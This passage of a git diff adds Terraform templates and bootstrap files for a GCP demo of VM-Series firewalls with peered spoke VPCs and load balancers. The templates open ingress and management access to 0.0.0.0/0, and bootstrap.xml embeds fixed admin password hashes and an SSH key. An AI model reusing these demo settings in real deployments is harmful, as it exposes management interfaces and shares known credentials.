a/gcp/adv_peering_4fw_2spoke/modules/vpc/main.tf b/gcp/adv_peering_4fw_2spoke/modules/vpc/main.tf new file mode 100644 index 00000000..0c614e1d --- /dev/null +++ b/gcp/adv_peering_4fw_2spoke/modules/vpc/main.tf @@ -0,0 +1,27 @@ +resource "google_compute_network" "default" { + name = var.vpc + delete_default_routes_on_create = var.delete_default_route + auto_create_subnetworks = false +} + +resource "google_compute_subnetwork" "default" { + count = length(var.subnets) + name = element(var.subnets, count.index) + ip_cidr_range = element(var.cidrs, count.index) + region = element(var.regions, count.index) + network = google_compute_network.default.self_link +} + +resource "google_compute_firewall" "default" { + count = length(var.allowed_sources) != 0 ? 1 : 0 + name = "${google_compute_network.default.name}-ingress" + network = google_compute_network.default.self_link + direction = "INGRESS" + source_ranges = var.allowed_sources + + allow { + protocol = var.allowed_protocol + ports = var.allowed_ports + } +} + diff --git a/gcp/adv_peering_4fw_2spoke/modules/vpc/outputs.tf b/gcp/adv_peering_4fw_2spoke/modules/vpc/outputs.tf new file mode 100644 index 00000000..e92488eb --- /dev/null +++ b/gcp/adv_peering_4fw_2spoke/modules/vpc/outputs.tf @@ -0,0 +1,24 @@ +output "subnetwork_id" { + value = google_compute_subnetwork.default.*.id +} + +output "subnetwork_name" { + value = google_compute_subnetwork.default.*.name +} + +output "subnetwork_self_link" { + value = google_compute_subnetwork.default.*.self_link +} + +output "vpc_name" { + value = google_compute_network.default.*.name +} + +output "vpc_id" { + value = google_compute_network.default.*.id[0] +} + +output "vpc_self_link" { + value = google_compute_network.default.*.self_link[0] +} + diff --git a/gcp/adv_peering_4fw_2spoke/modules/vpc/variables.tf b/gcp/adv_peering_4fw_2spoke/modules/vpc/variables.tf new file mode 100644 index 00000000..faccda44 --- /dev/null +++ b/gcp/adv_peering_4fw_2spoke/modules/vpc/variables.tf @@ -0,0 +1,33 @@ +variable "vpc" { +} + +variable "subnets" { + type = list(string) +} + +variable "cidrs" { + type = list(string) +} + +variable "regions" { + type = list(string) +} + +variable "allowed_sources" { + type = list(string) + default = [] +} + +variable "allowed_protocol" { + default = "all" +} + +variable "allowed_ports" { + type = list(string) + default = [] +} + +variable "delete_default_route" { + default = "false" +} + diff --git a/gcp/adv_peering_4fw_2spoke/outputs.tf b/gcp/adv_peering_4fw_2spoke/outputs.tf new file mode 100644 index 00000000..e81fb61e --- /dev/null +++ b/gcp/adv_peering_4fw_2spoke/outputs.tf @@ -0,0 +1,30 @@ +#----------------------------------------------------------------------------------------------- +# Outputs +output "GLB-ADDR" { + value = "http://${module.glb.address}" +} + +output "MGMT-FW1" { + value = "https://${module.fw_inbound.nic1_public_ip[0]}" +} + +output "MGMT-FW2" { + value = "https://${module.fw_inbound.nic1_public_ip[1]}" +} + +output "MGMT-FW3" { + value = "https://${module.fw_outbound.nic1_public_ip[0]}" +} + +output "MGMT-FW4" { + value = "https://${module.fw_outbound.nic1_public_ip[1]}" +} + +output "SSH-TO-SPOKE1" { + value = "ssh ${var.spoke_user}@${module.fw_inbound.nic0_public_ip[0]} -p 221 -i ${replace(var.public_key_path, ".pub", "")}" +} + +output "SSH-TO-SPOKE2" { + value = "ssh ${var.spoke_user}@${module.fw_inbound.nic0_public_ip[0]} -p 222 -i ${replace(var.public_key_path, ".pub", "")}" +} + diff --git a/gcp/adv_peering_4fw_2spoke/project.tf 
b/gcp/adv_peering_4fw_2spoke/project.tf new file mode 100644 index 00000000..835af2dc --- /dev/null +++ b/gcp/adv_peering_4fw_2spoke/project.tf @@ -0,0 +1,18 @@ +terraform { + required_version = ">= 0.12" +} + +provider "google" { + # credentials = var.auth_file + project = var.project_id + region = var.region +} + +provider "google-beta" { + # credentials = var.auth_file + project = var.project_id + region = var.region + version = "> 2.13.0" +} + +data "google_compute_zones" "available" {} \ No newline at end of file diff --git a/gcp/adv_peering_4fw_2spoke/scripts/showheaders.php b/gcp/adv_peering_4fw_2spoke/scripts/showheaders.php new file mode 100644 index 00000000..19c37318 --- /dev/null +++ b/gcp/adv_peering_4fw_2spoke/scripts/showheaders.php @@ -0,0 +1,62 @@ + + SOURCE & DESTINATION ADDRESSES +
'; +echo ''. "INTERVAL" .': '. $time .'
'; +$localIPAddress = getHostByName(getHostName()); +$sourceIPAddress = getRealIpAddr(); +echo ''. "SOURCE IP" .': '. $sourceIPAddress .'
'; +echo ''. "LOCAL IP" .': '. $localIPAddress .'
'; + +$vm_name = gethostname(); +echo ''. "VM NAME" .': '. $vm_name .'
'; +echo ''. '
'; +echo ' + HEADER INFORMATION +
'; +/* All $_SERVER variables prefixed with HTTP_ are the HTTP headers */ +foreach ($_SERVER as $header => $value) { + if (substr($header, 0, 5) == 'HTTP_') { + /* Strip the HTTP_ prefix from the $_SERVER variable, what remains is the header */ + $clean_header = strtolower(substr($header, 5, strlen($header))); + + /* Replace underscores by the dashes, as the browser sends them */ + $clean_header = str_replace('_', '-', $clean_header); + + /* Cleanup: standard headers are first-letter uppercase */ + $clean_header = ucwords($clean_header, " \t\r\n\f\v-"); + + /* And show'm */ + echo ''. $header .': '. $value .'
'; + } +} +?> diff --git a/gcp/adv_peering_4fw_2spoke/scripts/webserver-startup.sh b/gcp/adv_peering_4fw_2spoke/scripts/webserver-startup.sh new file mode 100644 index 00000000..94f78467 --- /dev/null +++ b/gcp/adv_peering_4fw_2spoke/scripts/webserver-startup.sh @@ -0,0 +1,8 @@ +#!/bin/bash +until sudo apt-get update; do echo "Retrying"; sleep 2; done +until sudo apt-get install -y php; do echo "Retrying"; sleep 2; done +until sudo apt-get install -y apache2; do echo "Retrying"; sleep 2; done +until sudo apt-get install -y libapache2-mod-php; do echo "Retrying"; sleep 2; done +until sudo rm -f /var/www/html/index.html; do echo "Retrying"; sleep 2; done +until sudo wget -O /var/www/html/index.php https://raw.githubusercontent.com/wwce/terraform/master/gcp/adv_peering_4fw_2spoke/scripts/showheaders.php; do echo "Retrying"; sleep 2; done +until sudo systemctl restart apache2; do echo "Retrying"; sleep 2; done \ No newline at end of file diff --git a/gcp/adv_peering_4fw_2spoke/spokes.tf b/gcp/adv_peering_4fw_2spoke/spokes.tf new file mode 100644 index 00000000..ce369362 --- /dev/null +++ b/gcp/adv_peering_4fw_2spoke/spokes.tf @@ -0,0 +1,112 @@ +#----------------------------------------------------------------------------------------------- +# Create spoke2 vpc with 2 web VMs (with internal LB). Create peer link with trust VPC. +module "vpc_spoke1" { + source = "./modules/vpc/" + vpc = var.spoke1_vpc + subnets = var.spoke1_subnets + cidrs = var.spoke1_cidrs + regions = [var.region] + allowed_sources = ["0.0.0.0/0"] + delete_default_route = true +} + +module "vm_spoke1" { + source = "./modules/vm/" + names = var.spoke1_vms + zones = [ + data.google_compute_zones.available.names[0], + data.google_compute_zones.available.names[1] + ] + subnetworks = [module.vpc_spoke1.subnetwork_self_link[0]] + machine_type = "f1-micro" + image = "ubuntu-os-cloud/ubuntu-1604-lts" + create_instance_group = true + ssh_key = fileexists(var.public_key_path) ? "${var.spoke_user}:${file(var.public_key_path)}" : "" + startup_script = file("${path.module}/scripts/webserver-startup.sh") +} + +module "ilb_web" { + source = "./modules/ilb/" + name = var.spoke1_ilb + subnetworks = [module.vpc_spoke1.subnetwork_self_link[0]] + all_ports = false + ports = ["80"] + health_check_port = "80" + ip_address = var.spoke1_ilb_ip + backends = { + "0" = [ + { + group = module.vm_spoke1.instance_group[0] + failover = false + }, + { + group = module.vm_spoke1.instance_group[1] + failover = false + } + ] + } + providers = { + google = google-beta + } +} + +resource "google_compute_network_peering" "trust_to_spoke1" { + name = "${var.trust_vpc}-to-${var.spoke1_vpc}" + provider = google-beta + network = module.vpc_trust.vpc_self_link + peer_network = module.vpc_spoke1.vpc_self_link + export_custom_routes = true +} + +resource "google_compute_network_peering" "spoke1_to_trust" { + name = "${var.spoke1_vpc}-to-${var.trust_vpc}" + provider = google-beta + network = module.vpc_spoke1.vpc_self_link + peer_network = module.vpc_trust.vpc_self_link + import_custom_routes = true + + depends_on = [google_compute_network_peering.trust_to_spoke1] +} + +#----------------------------------------------------------------------------------------------- +# Create spoke2 vpc with VM. Create peer link with trust VPC. 
+module "vpc_spoke2" { + source = "./modules/vpc/" + vpc = var.spoke2_vpc + subnets = var.spoke2_subnets + cidrs = var.spoke2_cidrs + regions = [var.region] + allowed_sources = ["0.0.0.0/0"] + delete_default_route = true +} + +module "vm_spoke2" { + source = "./modules/vm/" + names = var.spoke2_vms + zones = [data.google_compute_zones.available.names[0]] + machine_type = "f1-micro" + image = "ubuntu-os-cloud/ubuntu-1604-lts" + subnetworks = [module.vpc_spoke2.subnetwork_self_link[0]] + ssh_key = fileexists(var.public_key_path) ? "${var.spoke_user}:${file(var.public_key_path)}" : "" +} + +resource "google_compute_network_peering" "trust_to_spoke2" { + name = "${var.trust_vpc}-to-${var.spoke2_vpc}" + provider = google-beta + network = module.vpc_trust.vpc_self_link + peer_network = module.vpc_spoke2.vpc_self_link + export_custom_routes = true + + depends_on = [google_compute_network_peering.spoke1_to_trust] +} + +resource "google_compute_network_peering" "spoke2_to_trust" { + name = "${var.spoke2_vpc}-to-${var.trust_vpc}" + provider = google-beta + network = module.vpc_spoke2.vpc_self_link + peer_network = module.vpc_trust.vpc_self_link + import_custom_routes = true + + depends_on = [google_compute_network_peering.trust_to_spoke2] +} + diff --git a/gcp/adv_peering_4fw_2spoke/terraform.tfvars b/gcp/adv_peering_4fw_2spoke/terraform.tfvars new file mode 100644 index 00000000..df20d345 --- /dev/null +++ b/gcp/adv_peering_4fw_2spoke/terraform.tfvars @@ -0,0 +1,44 @@ +#project_id = "" +#public_key_path = "~/.ssh/gcp-demo.pub" + +#fw_panos = "byol-904" +#fw_panos = "bundle1-904" +#fw_panos = "bundle2-904" + + +#------------------------------------------------------------------- +region = "us-east4" + +mgmt_vpc = "mgmt-vpc" +mgmt_subnet = ["mgmt"] +mgmt_cidr = ["192.168.0.0/24"] +mgmt_sources = ["0.0.0.0/0"] + +untrust_vpc = "untrust-vpc" +untrust_subnet = ["untrust"] +untrust_cidr = ["192.168.1.0/24"] + +trust_vpc = "trust-vpc" +trust_subnet = ["trust"] +trust_cidr = ["192.168.2.0/24"] + +spoke1_vpc = "spoke1-vpc" +spoke1_subnets = ["spoke1-subnet1"] +spoke1_cidrs = ["10.10.1.0/24"] +spoke1_vms = ["spoke1-vm1", "spoke1-vm2"] +spoke1_ilb = "spoke1-ilb" +spoke1_ilb_ip = "10.10.1.100" + +spoke2_vpc = "spoke2-vpc" +spoke2_subnets = ["spoke2-subnet1"] +spoke2_cidrs = ["10.10.2.0/24"] +spoke2_vms = ["spoke2-vm1"] +spoke_user = "demo" + +fw_names_inbound = ["vmseries01", "vmseries02"] +fw_names_outbound = ["vmseries03", "vmseries04"] +fw_machine_type = "n1-standard-4" + +glb_name = "vmseries-glb" +ilb_name = "vmseries-ilb" + diff --git a/gcp/adv_peering_4fw_2spoke/variables.tf b/gcp/adv_peering_4fw_2spoke/variables.tf new file mode 100644 index 00000000..780f0a40 --- /dev/null +++ b/gcp/adv_peering_4fw_2spoke/variables.tf @@ -0,0 +1,116 @@ +variable "project_id" { + description = "GCP Project ID" +} + +# variable "auth_file" { +# description = "GCP Project auth file" +# } + +variable "region" { +} + +variable "fw_panos" { + description = "VM-Series license and PAN-OS (ie: bundle1-814, bundle2-814, or byol-814)" +} + +variable "fw_image" { + default = "https://www.googleapis.com/compute/v1/projects/paloaltonetworksgcp-public/global/images/vmseries" +} + +variable "fw_names_inbound" { + type = list(string) +} + +variable "fw_names_outbound" { + type = list(string) +} + +variable "fw_machine_type" { +} + +variable "glb_name" { +} + +variable "ilb_name" { +} + +variable "mgmt_vpc" { +} + +variable "mgmt_subnet" { + type = list(string) +} + +variable "mgmt_cidr" { + type = list(string) +} + +variable 
"untrust_vpc" { +} + +variable "untrust_subnet" { + type = list(string) +} + +variable "untrust_cidr" { + type = list(string) +} + +variable "trust_vpc" { +} + +variable "trust_subnet" { + type = list(string) +} + +variable "trust_cidr" { + type = list(string) +} + +variable "mgmt_sources" { + type = list(string) +} + +variable "spoke1_vpc" { +} + +variable "spoke1_subnets" { + type = list(string) +} + +variable "spoke1_cidrs" { + type = list(string) +} + +variable "spoke1_vms" { + type = list(string) +} + +variable "spoke1_ilb" { +} + +variable "spoke1_ilb_ip" { +} + +variable "spoke2_vpc" { +} + +variable "spoke2_subnets" { + type = list(string) +} + +variable "spoke2_cidrs" { + type = list(string) +} + +variable "spoke2_vms" { + type = list(string) +} + +variable "spoke_user" { + description = "SSH user for spoke Linux VM" +} + +variable "public_key_path" { + description = "Local path to public SSH key. If you do not have a public key, run >> ssh-keygen -f ~/.ssh/demo-key -t rsa -C admin" +} diff --git a/gcp/gcp-ilbnh/README.md b/gcp/gcp-ilbnh/README.md new file mode 100644 index 00000000..904ccc45 --- /dev/null +++ b/gcp/gcp-ilbnh/README.md @@ -0,0 +1,22 @@ +# gcp-ilbnh +ILB as next hop in GCP\ +This repository is intended to be used in conjunction with the 2-spoke advanced peering demo template: + +https://github.com/wwce/terraform/tree/master/gcp/adv_peering_2fw_2spoke + +This template may be used simultaneouly with or subsequent to the advanced peering template and will create an additional pair of FW behind an internal load balancer that can be used for outbound loadbalancing of TCP (only) traffic to provide redundancy of outbound connectivity. + +ILB as next hop is not currently GA. Consequently, routes will need to be modified post-deployment with the following gcloud CLI command: + +gcloud beta compute routes create default-ilbnh \\ \ +--network=trust-vpc \\ \ +--destination-range=0.0.0.0/0 \\ \ +--next-hop-ilb=ilbnh-all \\ \ +--next-hop-ilb-region=\ \\ \ +--priority=99 + +N.B. - This template was developed/tested using Terraform 0.11. + +## Support Policy +The guide in this directory and accompanied files are released under an as-is, best effort, support policy. These scripts should be seen as community supported and Palo Alto Networks will contribute our expertise as and when possible. We do not provide technical support or help in using or troubleshooting the components of the project through our normal support options such as Palo Alto Networks support teams, or ASC (Authorized Support Centers) partners and backline support options. The underlying product used (the VM-Series firewall) by the scripts or templates are still supported, but the support is only for the product functionality and not for help in deploying or using the template or script itself. +Unless explicitly tagged, all projects or work posted in our GitHub repository (at https://github.com/PaloAltoNetworks) or sites other than our official Downloads page on https://support.paloaltonetworks.com are provided under the best effort policy. 
diff --git a/gcp/gcp-ilbnh/bootstrap_files_ilbnh/authcodes b/gcp/gcp-ilbnh/bootstrap_files_ilbnh/authcodes new file mode 100644 index 00000000..0519ecba --- /dev/null +++ b/gcp/gcp-ilbnh/bootstrap_files_ilbnh/authcodes @@ -0,0 +1 @@ + \ No newline at end of file diff --git a/gcp/gcp-ilbnh/bootstrap_files_ilbnh/bootstrap.xml b/gcp/gcp-ilbnh/bootstrap_files_ilbnh/bootstrap.xml new file mode 100644 index 00000000..9f506a10 --- /dev/null +++ b/gcp/gcp-ilbnh/bootstrap_files_ilbnh/bootstrap.xml @@ -0,0 +1,632 @@ + + + + + + $1$eyegmtyu$VFbNwpbaZ8sUG40wpdo/A/ + + + yes + + + c3NoLXJzYSBBQUFBQjNOemFDMXljMkVBQUFBREFRQUJBQUFCQVFERmRyZmRqUUFSL2NnelVSRTYwLzFKbHFoWXEra3FIeGNxMlpOTTR5VkRobVZ3K2dnUXBxTWQwdG8yRmRZeXV4bUhHdVF4bGFMQkp4UDBtcW5LU3A2eUhqZ2orMTRHK29oYVpKbW5Bd3A2YXVkbXVHVkVEMnliVmZvcGc2dlh3WVdIaFdsSlk3N25ESStxQ1U1blRlMjlZNlpvU29PYmJZWkFqZjY5TXRBUzF2blEwZHduUzk2MEo4ZGdoWjMxK2Z5bTFWdDB5WFlmZ0JPYU4yK0JiK0dRa1dreEQ3UHErUEVYd3EvdysyajZ3d3ZmbEVGQVVkNXNMejh2TzBVMDBEYVZiVFVvMkFoR1VRZndlNVJsTDNTQzdzaTRQdDdYMWVsK2swTW54ZzMyUkt6UFM0ZHd6emYxRklJR2VhYVNnbVFNMGRuQ0hxYjNnMzdzWWpybWFVSGogcGdseW5u + + + + + yes + + + $1$xxqwnwvr$El9XN5KexgoltjkVjbkcd0 + + + + + + + + + + + + + yes + 5 + + + yes + 5 + + + yes + 5 + + + yes + 10 + + + yes + 5 + + + + yes + + + + 10 + 10 + + 100 + 50 + + + + 10 + 10 + + 100 + 50 + + + + + + 100 + yes + + + + + + + + + + + + + + no + + + + + no + + + no + + + no + + + + + + + + + no + + + + + no + + + no + + + + + + + + + + no + + + + + health-check + + + + + + + + 3 + 5 + wait-recover + + + + + no + yes + + + + + + + + + aes-128-cbc + 3des + + + sha1 + + + group2 + + + 8 + + + + + aes-128-cbc + + + sha256 + + + group19 + + + 8 + + + + + aes-256-cbc + + + sha384 + + + group20 + + + 8 + + + + + + + + aes-128-cbc + 3des + + + sha1 + + + group2 + + 1 + + + + + + aes-128-gcm + + + none + + + group19 + + 1 + + + + + + aes-256-gcm + + + none + + + group20 + + 1 + + + + + + + aes-128-cbc + + + sha1 + + + + + + + + + + + real-time + + + high + + + high + + + medium + + + medium + + + low + + + low + + + low + + + + + + + + + + no + + + 1.25 + 0.5 + 900 + 300 + 900 + yes + + + + + yes + + + + + no + + + no + + + no + + + + ethernet1/1 + ethernet1/2 + loopback.1 + + + + + + + + + + + + 192.168.2.1 + + + None + + + no + any + 2 + + ethernet1/1 + 10 + 35.191.0.0/16 + + + + + + + 192.168.2.1 + + + None + + + no + any + 2 + + ethernet1/1 + 10 + 130.211.0.0/22 + + + + + + + no + any + 2 + + + 192.168.2.1 + + + None + + ethernet1/1 + 10 + 10.10.1.0/24 + + + + + + + no + any + 2 + + + 192.168.2.1 + + + None + + ethernet1/1 + 10 + 10.10.2.0/24 + + + + + + + + + + + + + + + yes + no + yes + no + + + updates.paloaltonetworks.com + + + + + wednesday + 01:02 + download-only + + + + + US/Pacific + + yes + yes + + PA-VM + + + + yes + + + FQDN + + + + yes + no + yes + no + + + 8.8.8.8 + 4.2.2.2 + mgmt-interface-swap + + + + + + + + + + + + + ethernet1/1 + loopback.1 + + + + + + + ethernet1/2 + + + + + + + + + + + + + untrust + + + trust + + + any + + + any + + + any + + + any + + + any + + + any + + + any + + allow + + + + trust + + + trust + + + 35.191.0.0/16 + 130.211.0.0/22 + + + any + + + any + + + any + + + any + + + any + + + any + + allow + universal + + + + + + + drop + no + yes + + + deny + no + yes + + + + + + + + + + ethernet1/2 + + + + + untrust + + + trust + + + any + + + any + + any + + + + trust + + + trust + + + 35.191.0.0/16 + 130.211.0.0/22 + + + any + + any + ethernet1/1 + + 100.64.0.1 + + + + + + + + + ethernet1/1 + ethernet1/2 + loopback.1 + + + + + + + + diff --git 
a/gcp/gcp-ilbnh/bootstrap_files_ilbnh/init-cfg.txt b/gcp/gcp-ilbnh/bootstrap_files_ilbnh/init-cfg.txt new file mode 100644 index 00000000..8d3c0290 --- /dev/null +++ b/gcp/gcp-ilbnh/bootstrap_files_ilbnh/init-cfg.txt @@ -0,0 +1,10 @@ +type=dhcp-client +ip-address= +default-gateway= +netmask= +ipv6-address= +ipv6-default-gateway= +dhcp-accept-server-hostname=yes +dns-primary=8.8.8.8 +dns-secondary=4.2.2.2 +op-command-modes=mgmt-interface-swap \ No newline at end of file diff --git a/gcp/gcp-ilbnh/ilbnh.tf b/gcp/gcp-ilbnh/ilbnh.tf new file mode 100644 index 00000000..45879ab7 --- /dev/null +++ b/gcp/gcp-ilbnh/ilbnh.tf @@ -0,0 +1,66 @@ +provider "google" { + credentials = "${var.main_project_authfile}" + project = "${var.main_project}" + region = "${var.region}" + alias = "ilbnh" +} +#************************************************************************************ +# CREATE GCP BUCKET FOR VMSERIES BOOTSTRAP - ILBNH +#************************************************************************************ +module "bootstrap_ilbnh" { + source = "./modules/create_bootstrap_bucket_ilbnh/" + bucket_name = "vmseries-ilbnh" + randomize_bucket_name = true + file_location = "bootstrap_files_ilbnh/" + enable_ilbnh = "${var.enable_ilbnh}" + config = ["init-cfg.txt", "bootstrap.xml"] // default [] + license = ["authcodes"] // default [] + # content = ["panupv2-all-contents-8133-5346", "panup-all-antivirus-2917-3427", "panupv2-all-wildfire-331212-333889"] // default [] + # software = ["PanOS_vm-9.0.0"] // default [] +} + +#************************************************************************************ +# CREATE 2xVMSERIES FIREWALL W/ 3 NICS (MGMT VPC, UNTRUST VPC, TRUST VPC) - ILBNH +#************************************************************************************ +module "vm_fw_ilbnh" { + source = "./modules/create_vmseries_ilbnh/" + fw_names = ["vmseries03", "vmseries04"] + fw_machine_type = "n1-standard-4" + fw_zones = ["${var.region}-a", "${var.region}-b"] + fw_subnetworks = ["${module.vpc_trust.subnetwork_self_link[0]}", "${module.vpc_mgmt.subnetwork_self_link[0]}", "${module.vpc_untrust.subnetwork_self_link[0]}"] + enable_ilbnh = "${var.enable_ilbnh}" + fw_nic0_ip = ["192.168.2.4", "192.168.2.5"] // default [""] - enables dynamically assigned IP + fw_nic1_ip = ["192.168.0.4", "192.168.0.5"] + fw_nic2_ip = ["192.168.1.4", "192.168.1.5"] + + fw_bootstrap_bucket = "${module.bootstrap_ilbnh.bucket_name}" + fw_ssh_key = "admin:${var.vmseries_ssh_key}" + fw_image = "${var.vmseries_image}" + + create_instance_group = true + instance_group_names = ["vmseries03-ig", "vmseries04-ig"] // default "vmseries-instance-group" + + dependencies = [ + "${module.bootstrap_ilbnh.completion}", + ] +} + +#************************************************************************************ +# CREATE VMSERIES INTERNAL LOAD BALANCER - ILBNH +#************************************************************************************ +module "vmseries_internal_lb_ilbnh" { + source = "./modules/create_ilbnh/" + internal_lb_name_ilbnh = "ilbnh" + internal_lb_ports_ilbnh = "22" + subnetworks = ["${module.vpc_trust.subnetwork_self_link[0]}"] + internal_lbnh_ip = "192.168.2.6" + enable_ilbnh = "${var.enable_ilbnh}" + backends = [ + { + group = "${module.vm_fw_ilbnh.instance_group[0]}" + }, + { + group = "${module.vm_fw_ilbnh.instance_group[1]}" + }, + ] +} diff --git a/gcp/gcp-ilbnh/ilbnh_override.tf b/gcp/gcp-ilbnh/ilbnh_override.tf new file mode 100644 index 00000000..d3bb02dd --- /dev/null +++ 
b/gcp/gcp-ilbnh/ilbnh_override.tf @@ -0,0 +1,7 @@ +#************************************************************************************ +# ILBNH +#************************************************************************************ +variable "enable_ilbnh" { + description = "If set to true, enable ILB as Next Hop" + default = true +} diff --git a/gcp/gcp-ilbnh/modules/create_bootstrap_bucket_ilbnh/main.tf b/gcp/gcp-ilbnh/modules/create_bootstrap_bucket_ilbnh/main.tf new file mode 100644 index 00000000..23092e2b --- /dev/null +++ b/gcp/gcp-ilbnh/modules/create_bootstrap_bucket_ilbnh/main.tf @@ -0,0 +1,124 @@ +variable enable_ilbnh { + default = false +} +variable bucket_name {} + +variable file_location {} + +variable config { + type = "list" + default = [] +} + +variable content { + type = "list" + default = [] +} + +variable license { + type = "list" + default = [] +} + +variable software { + default = [] +} + +variable randomize_bucket_name { + default = false +} + +locals { + bucket_name = "${var.randomize_bucket_name ? join("", list(var.bucket_name, random_string.randomstring.result)) : var.bucket_name}" +} + +resource "random_string" "randomstring" { + count = "${var.randomize_bucket_name}" + length = 25 + min_lower = 15 + min_numeric = 10 + special = false +} + +resource "google_storage_bucket" "bootstrap" { + count = "${var.enable_ilbnh ? 1 : 0}" + name = "${local.bucket_name}" + force_destroy = true +} + +resource "google_storage_bucket_object" "config_full" { + count = "${(length(var.config) > 0 && var.enable_ilbnh) ? length(var.config) : "0" }" + name = "config/${element(var.config, count.index)}" + source = "${var.file_location}${element(var.config, count.index)}" + bucket = "${join(",",google_storage_bucket.bootstrap.*.name)}" +} + +resource "google_storage_bucket_object" "content_full" { + count = "${(length(var.content) > 0 && var.enable_ilbnh) ? length(var.content) : "0" }" + name = "content/${element(var.content, count.index)}" + source = "${var.file_location}${element(var.content, count.index)}" + bucket = "${join(",",google_storage_bucket.bootstrap.*.name)}" +} + +resource "google_storage_bucket_object" "license_full" { + count = "${(length(var.license) > 0 && var.enable_ilbnh) ? length(var.license) : "0" }" + name = "license/${element(var.license, count.index)}" + source = "${var.file_location}${element(var.license, count.index)}" + bucket = "${join(",",google_storage_bucket.bootstrap.*.name)}" +} +resource "google_storage_bucket_object" "software_full" { + count = "${(length(var.software) > 0 && var.enable_ilbnh) ? length(var.software) : "0" }" + name = "software/${element(var.software, count.index)}" + source = "${var.file_location}${element(var.software, count.index)}" + bucket = "${join(",",google_storage_bucket.bootstrap.*.name)}" +} +resource "google_storage_bucket_object" "config_empty" { + count = "${(length(var.config) == 0 && var.enable_ilbnh) ? 1 : 0 }" + name = "config/" + content = "config/" + bucket = "${join(",",google_storage_bucket.bootstrap.*.name)}" +} + +resource "google_storage_bucket_object" "content_empty" { + count = "${(length(var.content) == 0 && var.enable_ilbnh) ? 1 : 0 }" + name = "content/" + content = "content/" + bucket = "${join(",",google_storage_bucket.bootstrap.*.name)}" +} + +resource "google_storage_bucket_object" "license_empty" { + count = "${(length(var.license) == 0 && var.enable_ilbnh) ? 
1 : 0 }" + name = "license/" + content = "license/" + bucket = "${join(",",google_storage_bucket.bootstrap.*.name)}" +} + +resource "google_storage_bucket_object" "software_empty" { + count = "${(length(var.software) == 0 && var.enable_ilbnh) ? 1 : 0 }" + name = "software/" + content = "software/" + bucket = "${join(",",google_storage_bucket.bootstrap.*.name)}" +} + + +resource "null_resource" "dependency_setter" { + depends_on = [ + "google_storage_bucket.bootstrap", + "google_storage_bucket_object.config_full", + "google_storage_bucket_object.content_full", + "google_storage_bucket_object.license_full", + "google_storage_bucket_object.software_full", + "google_storage_bucket_object.config_empty", + "google_storage_bucket_object.content_empty", + "google_storage_bucket_object.license_empty", + "google_storage_bucket_object.software_empty", + ] +} + +output "completion" { + value = "${null_resource.dependency_setter.id}" +} + +output "bucket_name" { + value = "${join(",",google_storage_bucket.bootstrap.*.name)}" +} diff --git a/gcp/gcp-ilbnh/modules/create_ilbnh/main.tf b/gcp/gcp-ilbnh/modules/create_ilbnh/main.tf new file mode 100644 index 00000000..52e818e9 --- /dev/null +++ b/gcp/gcp-ilbnh/modules/create_ilbnh/main.tf @@ -0,0 +1,51 @@ +variable enable_ilbnh { + default = false +} +variable "internal_lb_name_ilbnh" { + default = "ilbnh" +} +variable "internal_lb_ports_ilbnh" { + default = "22" +} +variable backends { + description = "Map backend indices to list of backend maps." + type = "list" +} +variable subnetworks { + type = "list" +} +variable "internal_lbnh_ip" { + default = "" +} +#************************************************************************************ +# CREATE VMSERIES INTERNAL LOAD BALANCER - ILBNH +#************************************************************************************ +resource "google_compute_health_check" "health_check_ilbnh" { + name = "${var.internal_lb_name_ilbnh}-check" + count = "${var.enable_ilbnh ? 1 : 0}" + + tcp_health_check { + port = "${var.internal_lb_ports_ilbnh}" + } +} + +resource "google_compute_region_backend_service" "backend_service_ilbnh" { + name = "${var.internal_lb_name_ilbnh}" + count = "${var.enable_ilbnh ? 1 : 0}" + health_checks = ["${google_compute_health_check.health_check_ilbnh.self_link}"] + backend = ["${var.backends}"] + session_affinity = "CLIENT_IP" + +} + + +resource "google_compute_forwarding_rule" "forwarding_rule_ilbnh" { + name = "${var.internal_lb_name_ilbnh}-all" + count = "${var.enable_ilbnh ? 
1 : 0}" + load_balancing_scheme = "INTERNAL" + ip_address = "${var.internal_lbnh_ip}" + ip_protocol = "TCP" + all_ports = true + subnetwork = "${var.subnetworks[0]}" + backend_service = "${google_compute_region_backend_service.backend_service_ilbnh.self_link}" +} \ No newline at end of file diff --git a/gcp/gcp-ilbnh/modules/create_vmseries_ilbnh/main.tf b/gcp/gcp-ilbnh/modules/create_vmseries_ilbnh/main.tf new file mode 100644 index 00000000..dcfa2fae --- /dev/null +++ b/gcp/gcp-ilbnh/modules/create_vmseries_ilbnh/main.tf @@ -0,0 +1,172 @@ +variable enable_ilbnh { + default = false +} +variable fw_subnetworks { + type = "list" +} + +variable fw_names { + type = "list" +} + +variable fw_machine_type {} + +variable fw_zones { + type = "list" +} + +variable fw_cpu_platform { + default = "Intel Skylake" +} + +variable fw_bootstrap_bucket { + default = "" +} + +variable fw_ssh_key {} + +variable public_lb_create { + default = false +} + +variable fw_scopes { + type = "list" + + default = [ + "https://www.googleapis.com/auth/cloud.useraccounts.readonly", + "https://www.googleapis.com/auth/devstorage.read_only", + "https://www.googleapis.com/auth/logging.write", + "https://www.googleapis.com/auth/monitoring.write", + ] +} + +variable fw_image {} + +variable fw_tags { + type = "list" + default = [] +} + +variable create_instance_group { + default = false +} + +variable instance_group_names { + type = "list" + default = ["vmseries-instance-group"] +} + +variable "dependencies" { + type = "list" + default = [] +} + +variable fw_nic0_ip { + type = "list" + default = [] +} + +variable fw_nic1_ip { + type = "list" + default = [] +} + +variable fw_nic2_ip { + type = "list" + default = [] +} +variable instance_group { + type = "list" + default = [] +} + +resource "null_resource" "dependency_getter" { + provisioner "local-exec" { + command = "echo ${length(var.dependencies)}" + } +} + +#************************************************************************************ +# CREATE VMSERIES +#*********************************************************************************** +resource "google_compute_instance" "vmseries" { + count = "${(length(var.fw_names) > 0 && var.enable_ilbnh) ? 
